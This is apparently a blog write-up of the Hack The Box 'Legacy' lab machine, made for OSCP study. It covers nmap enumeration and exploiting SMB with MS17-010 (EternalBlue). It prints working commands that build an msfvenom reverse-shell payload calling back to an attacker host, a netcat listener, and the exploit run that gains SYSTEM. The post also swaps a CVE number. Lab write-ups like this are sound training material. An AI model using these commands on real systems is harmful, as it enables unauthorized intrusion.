Hack The Box: Legacy Write-up (#29)

This is my 28th box out of 42 boxes for OSCP preparation. I am doing my best learning and mastering the key skills for my upcoming OSCP exams by writing this series of blogs. So let’s begin.

Reconnaissance

Run a full TCP scan.

nmap -sC -sV -O -p- -oA nmap/full 10.10.10.4

• -sC: Default Nmap script
• -sV: Service/version info
• -O: Enable OS detection
• -oA: Output scan results in 3 different formats
• -p-: Scan all ports from 1–65535

We get the back the following result:

• Port 139: — Running netbios-ssn service
• Port 445: — Running samba service

Nmap scan report for 10.10.10.4
Host is up (0.0082s latency).
Not shown: 65532 filtered ports
PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_clock-skew: mean: -4h30m00s, deviation: 2h07m16s, median: -6h00m00s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:61:f7 (VMware)
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2020-08-29T07:08:17+03:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
...

Similarly, run a UDP scan.

nmap -sU -O -p- -oA nmap/udp 10.10.10.84

• -sU: UDP scan

We get back the following results.

• Port 137: — Running netbios-ns service.

Nmap scan report for ip-10-10-10-4.ap-southeast-1.compute.internal (10.10.10.4)
Host is up, received user-set (0.28s latency).
Scanned at 2020-08-25 09:03:24 +08 for 1s
PORT    STATE SERVICE    REASON               VERSION
137/udp open  netbios-ns udp-response ttl 127 Microsoft Windows netbios-ns (workgroup: HTB)
Service Info: Host: LEGACY; OS: Windows; CPE: cpe:/o:microsoft:windows
...

From the results above, the only point of entry into this box is possibly through exploiting SMB service.

Service Enumeration

Port 139,445 (Samba Service)

Let’s run Nmap script to scan for SMB vulnerabilities.

nmap -script smb-vuln* -p139,445 10.10.10.4

We get back the following results.

Nmap SMB vulnerability script

The result shows this box is vulnerable to CVE-2008–4250 and CVE-2017–0143. CVE-2008–4250 is famous for Ethernal Blue vulnerability that exploited SMBv1 protocol. Since the target machine is running SMBv1 we’ll use this vulnerability.

Exploitation

The EternalBlue exploit works by taking advantage of SMBv1 vulnerabilities present in older versions of Microsoft operating systems. The exploit makes use of the way Microsoft Windows handles, or rather mishandles, specially crafted packets from malicious attackers. All the attacker needs to do is send a maliciously-crafted packet to the target server, and, boom, the malware propagates and a cyberattack ensues.

A quick Google search for “how to exploit ms17–010 without Metasploit ” leads me to this article. We’ll download the exploit script and execute on the target machine.

Clone the GitHub repo.

git clone https://github.com/helviojunior/MS17-010.git

Next, use msfvenom to create reverse shell payload with the following command.

msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.9 lport=53 EXITFUNC=thread -f exe -o exploit.exe

Set up a netcat listener in Kali Linux.

nc -nlvp 53

Now, run the exploit.

python /opt/MS17-010/send_and_execute.py 10.10.10.4 exploit.exe

We get a reverse shell.

Reverse shell

If you noticed above, whoami.exe binary is not recognised. It is only available from windows Server 2003 and onwards. We might need to transfer this binary manually to this server. But for now, let’s grab the user.txt.

user.txt

Post-Exploitation Enumeration

To make files transfer easy between my Kali Linux and target machine, I had setup a simple SMB share without creds in my current working directory where all the necessary binaries I already placed here.

Run the following command in Kali Linux.

python /usr/share/doc/python3-impacket/examples/smbserver.py tools .

I named the share as tools.

From the reverse shell, copy whoami.exe from our share to John’s desktop

C:\Documents and Settings\john\Desktop>copy \\10.10.14.9\tools\whoami.exe .

Run the whoami.exe command.

SYSTEM shell

We are already in SYSTEM shell.

Grab the root.txt flag.

root.txt

Attack Strategy Map

Thank you for reading :-) Next box is Blue.